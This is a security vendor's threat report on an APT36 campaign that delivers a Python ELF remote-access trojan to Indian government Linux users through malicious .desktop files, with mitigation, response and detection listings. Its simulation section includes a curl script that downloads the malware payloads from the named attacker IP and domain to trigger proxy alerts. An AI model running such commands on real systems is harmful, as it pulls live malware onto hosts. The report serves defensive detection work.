SOC Prime Bias: Critical

04 Dec 2025 18:28

CYFIRMA

APT36 Deploys Python ELF Malware Against Indian Government Entities

Ruslan Mikhalov Chief of Threat Research at SOC Prime

APT36 Deploys Python ELF Malware Against Indian Government Entities

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

APT36 (Transparent Tribe) ran a spear-phishing campaign that dropped malicious Linux .desktop shortcut files on Indian government users. These launchers retrieve and run a Python-based ELF RAT named swcbc from an attacker-controlled server. The malware maintains persistence through a user-level systemd service and communicates with its C2 over HTTP to exfiltrate data and execute commands. The campaign underscores the group’s growing ability to operate effectively in Linux environments.

Investigation

The investigation followed the chain from the initial .zip attachment to the .desktop launcher, the decoy PDF, and the two payloads (swcbc ELF binary and swcbc.sh script) downloaded from an actor-controlled IP address. Analysis showed the ELF binary is a PyInstaller-packed Python RAT with capabilities for system profiling, file upload/download, screen capture, and self-removal. Persistence is implemented by registering a systemd service inside the user’s configuration directory.

Mitigation

Recommended defenses include blocking execution of .desktop, .sh, and ELF binaries received via email and enforcing sandbox execution for suspicious attachments. Disable automatic execution from world-writable paths like /tmp and apply noexec mount options where possible. Monitor DNS and HTTP traffic for connections to the identified malicious domain and IP. Enforce strict application control on tools such as curl and LibreOffice.

Response

When activity is detected, isolate the impacted Linux host, collect the malicious artifacts and the systemd service unit, and remove the hidden ~/.swcbc directory. Use forensic tooling to extract the host’s unique identifier and terminate any ongoing C2 sessions. Update detection content with the observed IOCs and proactively hunt for similar patterns across the broader environment.

“`mermaid graph TB %% Class Definitions classDef action fill:#99ccff classDef artifact fill:#ffdd88 classDef malware fill:#ff9999 classDef process fill:#c2f0c2 %% Nodes – Actions (MITRE Techniques) initial_access_phishing[“Action – T1566 Phishing: Spearphishing Attachment Description: Adversary emails a malicious .desktop shortcut to the target.”] class initial_access_phishing action user_execution_file[“Action – T1204.002 User Execution: Malicious File Description: Victim opens the .desktop file, causing the embedded script to run.”] class user_execution_file action obfuscation[“Action – T1027 Obfuscated Files: Data Encoding Description: Script is stored as a Base64‑encoded string and the ELF payload is packed with PyInstaller.”] class obfuscation action masquerading[“Action – T1036 Masquerading Description: .desktop shortcut mimics a legitimate office document and opens a decoy PDF.”] class masquerading action ingress_tool_transfer[“Action – T1105 Ingress Tool Transfer Description: Script downloads an ELF binary and a shell script from a remote HTTP server.”] class ingress_tool_transfer action execution_unix_shell[“Action – T1059 Command and Scripting Interpreter: Unix Shell Description: Downloader grants execution permission and runs the payloads in background.”] class execution_unix_shell action persistence_systemd[“Action – T1543 Create or Modify System Process Description: Malicious systemd user‑service is created and enabled to start at login.”] class persistence_systemd action persistence_boot_script[“Action – T1037.004 Boot or Logon Initialization Scripts Description: User‑level systemd service acts as a boot‑or‑logon script for persistence.”] class persistence_boot_script action discovery_system_info[“Action – T1082 System Information Discovery Description: ELF RAT gathers OS version, hostname, username and MAC address.”] class discovery_system_info action discovery_file_dir[“Action – T1083 File and Directory Discovery Description: Malware enumerates the filesystem to locate files for exfiltration.”] class discovery_file_dir action command_control_app_layer[“Action – T1071 Application Layer Protocol Description: Implant communicates with C2 server using HTTP GET/POST.”] class command_control_app_layer action data_encoding[“Action – T1132 Data Encoding Description: C2 payloads are Base64‑encoded to obscure content.”] class data_encoding action collection_local_data[“Action – T1005 Data from Local System Description: RAT archives selected files into ZIP archives for upload.”] class collection_local_data action exfiltration_http[“Action – T1005 Data from Local System (Exfiltration) Description: Archives are sent to attacker via HTTP POST requests.”] class exfiltration_http action %% Nodes – Artifacts / Malware file_desktop[“Artifact – .desktop Shortcut File: Analysis_Proc_Report_Gem.desktop Purpose: Triggers Base64 script execution.”] class file_desktop artifact script_base64[“Malware – Base64 Script Content: Decodes and runs the downloader logic.”] class script_base64 malware elf_payload[“Malware – ELF Binary (swcbc) Type: Packed RAT delivered via PyInstaller.”] class elf_payload malware shell_script_payload[“Malware – Shell Script (swcbc.sh) Purpose: Helper script to set up persistence.”] class shell_script_payload malware systemd_service[“Artifact – Systemd Service File Location: ~/.config/systemd/user/swcbc.service Effect: Runs ELF payload at user login.”] class systemd_service artifact %% Edges – Attack Flow initial_access_phishing –>|delivers| file_desktop file_desktop –>|invokes| script_base64 script_base64 –>|obfuscates| obfuscation script_base64 –>|masquerades as| masquerading script_base64 –>|downloads| elf_payload script_base64 –>|downloads| shell_script_payload ingress_tool_transfer –>|facilitates download of| elf_payload ingress_tool_transfer –>|facilitates download of| shell_script_payload script_base64 –>|executes via| execution_unix_shell elf_payload –>|runs as| process_elf[(“ELF Process”)] class process_elf process process_elf –>|establishes| command_control_app_layer process_elf –>|collects system info via| discovery_system_info process_elf –>|enumerates files via| discovery_file_dir process_elf –>|archives files via| collection_local_data collection_local_data –>|encodes data via| data_encoding collection_local_data –>|exfiltrates via| exfiltration_http exfiltration_http –>|uses| command_control_app_layer shell_script_payload –>|creates| systemd_service systemd_service –>|enables| persistence_systemd persistence_systemd –>|provides| persistence_boot_script persistence_boot_script –>|ensures execution at login| execution_unix_shell “`

Attack Flow

Detections

APT36 Malicious URL Download Detection [Proxy]

SOC Prime AI Rules

4 Dec 2025

View

APT36 Malicious .desktop and Shell Script Execution [Linux Process Creation]

SOC Prime AI Rules

4 Dec 2025

View

IOCs (SourceIP) to detect: APT36 Python Based ELF Malware Targeting Indian Government Entities

SOC Prime AI Rules

4 Dec 2025

View

IOCs (DestinationIP) to detect: APT36 Python Based ELF Malware Targeting Indian Government Entities

SOC Prime AI Rules

4 Dec 2025

View

IOCs (HashSha256) to detect: APT36 Python Based ELF Malware Targeting Indian Government Entities

SOC Prime AI Rules

4 Dec 2025

View

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

Attack Narrative & Commands:
An APT‑36 operator hosts three payloads on compromised infrastructure and distributes their URLs via a phishing email. The victim, using a web browser configured to route traffic through the corporate proxy, clicks each link. The proxy logs each GET request, producing entries that match the rule’s url|all list. The payloads are:
1. A raw ELF binary (swcbc) delivered over HTTP.
2. A shell script (swcbc.sh) that, when executed, installs the ELF.
3. A decoy PDF (Analysis_Proc_Report_Gem.pdf) intended to encourage the user to open the file while the malicious ELF runs in the background.

Regression Test Script:

#!/usr/bin/env bash
# APT‑36 malicious URL download simulation – triggers the Sigma rule.
set -euo pipefail

# Define the malicious URLs (exact strings from the Sigma rule)
urls=(
    "http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc"
    "http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc.sh"
    "https://lionsdenim.xyz/in/Analysis_Proc_Report_Gem.pdf"
)

# Download each payload through the corporate proxy.
# Assume the environment variable http_proxy/https_proxy points to the proxy.
for u in "${urls[@]}"; do
    echo "[*] Downloading $u via proxy..."
    curl -s -O "$u"
done

echo "[+] All malicious files downloaded. Check proxy logs for matching URLs."

Save the script as apt36_simulation.sh, make it executable (chmod +x apt36_simulation.sh), and run it on the protected workstation.

Cleanup Commands:

#!/usr/bin/env bash
# Remove all files created by the simulation
rm -f swcbc swcbc.sh Analysis_Proc_Report_Gem.pdf
echo "[+] Cleanup complete."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free

Name	Descripiton
PHPSESSID	Preserves user session state across page requests. Cookie generated by applications based on the PHP language. This is a general purpose identifier used to maintain user session variables. It is normally a random generated number, how it is used can be specific to the site, but a good example is maintaining a logged-in status for a user between pages.
sp_i	Used to store information about authenticated User.
sp_r	Used to store information about authenticated User.
sp_a	Used to store information about authenticated User.

Name	Descripiton
tuuid	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
tuuid_last_update	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
um	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
umeh	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
na_sc_x	Used by the social sharing platform AddThis to keep a record of parts of the site that has been visited in order to recommend other parts of the site.
APID	Collects anonymous data related to the user's visits to the website.
IDSYNC	Collects anonymous data related to the user's visits to the website.
_cc_aud	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_cc	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_dc	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_id	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
dpm	Via a unique ID that is used for semantic content analysis, the user's navigation on the website is registered and linked to offline data from surveys and similar registrations to display targeted ads.
acs	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded, with the purpose of displaying targeted ads.
clid	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded, with the purpose of displaying targeted ads.
KRTBCOOKIE_#	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
PUBMDCID	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
PugT	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
ssi	Registers a unique ID that identifies a returning user's device. The ID is used for targeted ads.
_tmid	Registers a unique ID that identifies the user's device upon return visits. The ID is used to target ads in video clips.
wam-sync	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
wui	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
AFFICHE_W	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
B	Collects anonymous data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The registered data is used to categorise the users' interest and demographical profiles with the purpose of customising the website content depending on the visitor.
1P_JAR	These cookies are used to gather website statistics, and track conversion rates.
APISID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
HSID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
NID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SAPISID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SIDCC	Security cookie to protect users data from unauthorised access.
SSID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
__utmx	This cookie is associated with Google Website Optimizer, a tool designed to help site owners improve their wbesites. It is used to distinguish between two varaitions a webpage that might be shown to a visitor as part of an A/B split test. This helps site owners to detemine which version of a page performs better, and therefore helps to improve the website.
__utmxx	This cookie is associated with Google Website Optimizer, a tool designed to help site owners improve their wbesites. It is used to distinguish between two varaitions a webpage that might be shown to a visitor as part of an A/B split test. This helps site owners to detemine which version of a page performs better, and therefore helps to improve the website.

Name	Descripiton
_hjid	Hotjar cookie. This cookie is set when the customer first lands on a page with the Hotjar script. It is used to persist the random user ID, unique to that site on the browser. This ensures that behavior in subsequent visits to the same site will be attributed to the same user ID.
_hjIncludedInSample	This cookie is associated with web analytics functionality and services from Hot Jar, a Malta based company. It uniquely identifies a visitor during a single browser session and indicates they are included in an audience sample.
intercom-id-[xxx]	This cookie is used by Intercom as a session so that users can continue a chat as they move through the site.
intercom-session-[xxx]	Used to keeping track of sessions and remember logins and conversations.
demdex	Via a unique ID that is used for semantic content analysis, the user's navigation on the website is registered and linked to offline data from surveys and similar registrations to display targeted ads.
CookieConsent	Stores the user's cookie consent state for the current domain.
__cfduid	Used by the content network, Cloudflare, to identify trusted web traffic.
ss	These cookies enable the website to provide enhanced functionality and personalisation . They may be set by us or by third party providers whose services we have added to our pages. These services may include the Live Chat facility, Contact Us form(s), the Product Quotation forms and submission process, and the Email Newsletter sign up functionality .

Name	Descripiton
_ga	This cookie name is asssociated with Google Universal Analytics - which is a significant update to Google's more commonly used analytics service. This cookie is used to distinguish unique users by assigning a randomly generated number as a client identifier. It is included in each page. Registers a unique ID that is used to generate statistical data on how the visitor uses the website. request in a site and used to calculate visitor, session and campaign data for the sites analytics reports. By default it is set to expire after 2 years, although this is customisable by website owners.
_gat	Used by Google Analytics to throttle request rate. This cookie name is associated with Google Universal Analytics, according to documentation it is used to throttle the request rate - limiting the collection of data on high traffic sites. It expires after 10 minutes.
_gid	This cookie name is asssociated with Google Universal Analytics. This appears to be a new cookie and as of Spring 2017 no information is available from Google. It appears to store and update a unique value for each page visited. Registers a unique ID that is used to generate statistical data on how the visitor uses the website.
IDE	Used by Google DoubleClick to register and report the website user's actions after viewing or clicking one of the advertiser's ads with the purpose of measuring the efficacy of an ad and to present targeted ads to the user.
r/collect	Used by Google DoubleClick to register and report the website user's actions after viewing or clicking one of the advertiser's ads with the purpose of measuring the efficacy of an ad and to present targeted ads to the user.
test_cookie	Used to check if the user's browser supports cookies.
collect	Used to send data to Google Analytics about the visitor's device and behaviour. Tracks the visitor across devices and marketing channels.
ads/user-lists/#	These cookies may be set through our site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites.
c	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
khaos	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
put_#	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
rpb	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
rpx	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
tap.php	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.